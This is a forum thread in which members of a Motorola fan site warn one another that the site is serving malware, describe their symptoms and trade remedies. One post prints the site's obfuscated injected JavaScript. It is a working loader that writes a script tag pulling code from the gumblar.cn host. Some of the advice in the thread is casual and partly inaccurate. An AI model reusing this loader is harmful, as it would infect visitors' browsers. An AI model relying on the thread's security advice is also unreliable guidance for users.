Motorolafans Infected with trojans and Malwares. Users and Admins please be aware!

[wyrm]

Here is the script, when still obfuscated. (unobfuscated version was posted earlier on this topic)

function(whF7){var ZG8='%';eval(unescape(('var:23a:3d:23Sc:72i:73:74En:67ine:22:2cb:3d:22Versio:6e:2+:22:2cj:3d:22:22:2cu:3dnav:69:67ator:2eu:73:65rAge:6et:3bif((u:2e:69n:64ex:4f:66(:22Wi:6e:22):320:29:26
:26(u:2e:69nd:65xOf(:22NT:206:22):3c0):25:26(do:63:75:6d:65nt:2ec:6fokie:2e:69ndexO:66(:22mie:6b:3d:31
:22):3c0):25:26(t:79peof(zrv:7at:73):21:3dtyp:65of:22:22A:22:29)):7bzrv:7ats:3d:22A:22:3beval(:22:69f(window
:2e:22:2b:61+:22)j:3d:6a+:22:2ba+:22Majo:72:22+b+a+:22Minor:22+b:2ba+:27:42:74i:6cd:22+b+:22j:33:22:29
:3bd:6fcum:65n:74:2ew:72ite(:22:3c:73:63r:69pt:20src:3d:2f:2fgumblar:2e:63n:2fr:73s:2f:3f:69:64:3d:22+j:2b:22
:3e:3c:5c:2fs:63ript:3e:22):3b:7d').replace(whF7,'%')))})(/:/g);

[motomaster]

It is infected for sure but as long as you are dependent on Internet Security s/w , you don't need to worry at all , especially the script can be dangerous if someone uses IE 7.0 or below (the versions w/o standard addons), but as for firefox users the new 3.0 beta version asks for confirmation if you run it in safe mode along with the addon provided in post#15.

[addu]

Yes it is infected, because it is giving me unusual problem and error.
Ill provide you some screenshots of the problems i'm facing with this website.
All other website works fine and normal.

[swifty]

Install linux and enjoy the malware free world.

It is not such easy sometimes

Our Server is running Linux!
Linux can't help you much if the installed software has security flaws (PHP,SQL and damn JavaScript).

[addu]

here i'm facing this problem, the page loads and it shows done and I get only an half display

[swifty]

take that:
Motorola Development Community - Motorola Development Community

[addu]

That is not the problem, whenever I open a thread it just shows me the last 2 or 3 post on that page, the upper part does not show up.

[wyrm]

It is not such easy sometimes

Our Server is running Linux!
Linux can't help you much if the installed software has security flaws (PHP,SQL and damn JavaScript).

Not really... I bet one of the admins Windows PC is compromised, and the guy just entered your linux server through the front door (using someones password).

I would check the server logs, change all admins/FTP access passwords, etc.. All this from a linux box.

All people with admin/ftp access should format their windows boxes before logging to motorolafans again.

[Scotsman828]

Two days ago my computer was attacked by the code when viewing Motofans, I knew something was wrong when my HD was going crazy. But I was able to put a stop to it by hitting Ctrl, Alt, Del and forcing a IE shutdown. Did a scan and found one hit in Documents and Settings and sent it into quarentine. I thought it was a one time thing, but got attacked again last night and again had to force IE shutdown. But this time the scans have been negative. So I believe the virus has hidden itself.
For all of those members running a Windows PC, I recommend manually deleting all your IE Internet Temp folder files and all passwords and cookies. And don't use IE to pay bills online until this security flaw is fixed by MS with a patch to IE. If you have a Linux HD/partition on your computer, I suggest you switch to that until this problem is fixed.
The infection of Motofans is tame compared to ZDNet, I get 3 virus and trojan hits per page over there.

[motomaster]

I actually tested the website on IE7 and damn! the browser BHO's (Browser Helper Objects)
got disabled and won't revert back to ''reset to default''.
Firefox hangs when loading : Forums, I had to kill the process thrice but the safe mode is good enough.
IE 8 lags a lot while the load.